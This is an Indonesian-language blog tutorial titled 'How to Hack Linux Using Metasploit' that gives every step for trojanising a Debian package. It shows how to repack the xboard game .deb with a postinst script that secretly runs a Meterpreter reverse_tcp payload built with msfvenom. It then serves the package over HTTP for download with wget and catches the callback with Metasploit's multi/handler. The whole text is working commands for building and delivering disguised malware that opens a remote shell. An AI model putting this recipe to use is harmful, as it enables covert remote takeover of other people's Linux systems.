How to Hack Linux Using Metasploit ! | ExploitPedia

 Admin gak on dari 2016, Maklum :v
 Btw thanks yg masih setia mengikuti blog saya :v

Oke langsung saja kita mulai.

A. Pengertian
Mungkin dari beberapa pembaca disini sudah mengetahui apa itu metasploit,

B. Latar Belakang
Banyak orang bilang bahwa linux itu aman dari virus, saya sendiri awalnya juga menganggap seperti itu,disini saya akan sedikit berbagi mengenai How to hack linux using Metasploit !.

C. Tahap Pelaksanaan

1. Sebelum mengikuti tutorial sebaiknya anda memakai os Linux (Direkomendasikan Memakai Os Pentest seperti Backbox,Kali Linux,dll)
2. Disini saya memanfaatkan VMware sebagai tumbalnya
3. Tentunya ada koneksi internet yang nanti untuk mendownload sebuah Package
4. Buka terminal anda dan masukin perintah seperti dibawah ini
   

   root@linuxsec:~# apt-get --download-only install xboard

5. Setelah itu buatlah sebuah folder di tmp dengan memasukan perintah seperti dibawah ini
   

   root@linuxsec:~# mkdir /tmp/linuxsec

6. Lalu pindahkan package xboard ke folder yang baru saja tadi dibuat, seperti dibawah ini
   

   root@linuxsec:~# mv /var/cache/apt/archives/xboard_4.7.3-1_amd64.deb /tmp/linuxsec

7. Setelah itu masuk ke folder yang baru saja di buat,masukan perintah seperti ini
   

   root@linuxsec:/tmp/linuxsec# dpkg -x xboard_4.7.3-1_amd64.deb gamerat
   root@linuxsec:/tmp/linuxsec# mkdir gamerat/DEBIAN

8. Masuk ke folder DEBIAN lalu buat file "control" dan isilah file tersebut seperti dibawah ini
   

   Package: Xboard
   Version: 1.0.0
   Section: Games and Amusement
   Priority: optional
   Architecture: i386
   Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
   Description: Mohon Bersabar Ini Ujian

   note : Description bisa anda ubah
    
9. Kalau sudah buatlah file lagi yaitu "postinst", dan isi filenya seperti dibawah ini
   

   #!bin/sh
   sudo chmod 2755 /usr/games/xboard_nilai && /usr/games/xboard_nilai & /usr/games/xboard &

10. Setelah itu kita buat payloadnya,masukan perintah seperti dibawah ini
    

    root@linuxsec:~# msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.117.1 LPORT=1337 -b "\x00" -f elf -o /tmp/linuxsec/gamerat/usr/games/xboard_nilai

    note : ubah path yang saya kasih warna merah dengan path anda, dan ubah ip sama port yang saya kasih warna hijau sesuai konfigurasi awal anda
    
11. Setelah itu kasih hak akses dan build package tersebut, dengan memasukan perintah seperti dibawah ini
    

    root@linuxsec:~# cd /tmp/linuxsec/gamerat/DEBIAN
    root@linuxsec:/tmp/linuxsec/gamerat/DEBIAN# chmod 755 postinst
    root@linuxsec:/tmp/linuxsec/gamerat/DEBIAN# cd /tmp/linuxsec/
    root@linuxsec:/tmp/linuxsec/# dpkg-deb --build gamerat 

12. Setelah itu copy trojannya taruh di /var/www atau /var/www/html
13. Trojan kita sudah jadi sekarang anda eksekusi filenya di VMware Dan Meremotenya,,caranya gimana ?
14. Installah terlebih dahulu gufw < pengertian dan cara penggunaan anda bisa cari di google
15. Lalu buka Terminal anda ketikan perintah seperti dibawah ini
    

    msf > use exploit/multi/handler
    msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
    payload => linux/x86/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost 172.16.117.1
    lhost => 172.16.117.1
    msf exploit(handler) > set lport 1337
    lport => 1337
    msf exploit(handler) > exploit

16. Setelah itu di OS Guest(Os linux yang dijadikan tumbal ,sudah terinstall di vmware)
17. Masuk ke OS Guest Guset tersbut dan download file anda, dengan memasukan perintah seperti berikut
    

    wget http://172.16.117.1/gamerat.deb

18. Masih di Os Guest > eksekusi filenya dengan memamuskan perintah
    

    root@guestos:/home/guestos# chmod +x gamerat.deb
    root@gusetos:/home/guestos# dpkg -i gamerat.deb

19. Lihat apa yang terjadi di metasploit console anda di Os Host

Kalu muncul seperti gambar dibawah ini berarti anda sukses mengikuti tutorial seperti diatas

Semoga bermanfaat
source & thanks : LinuxSec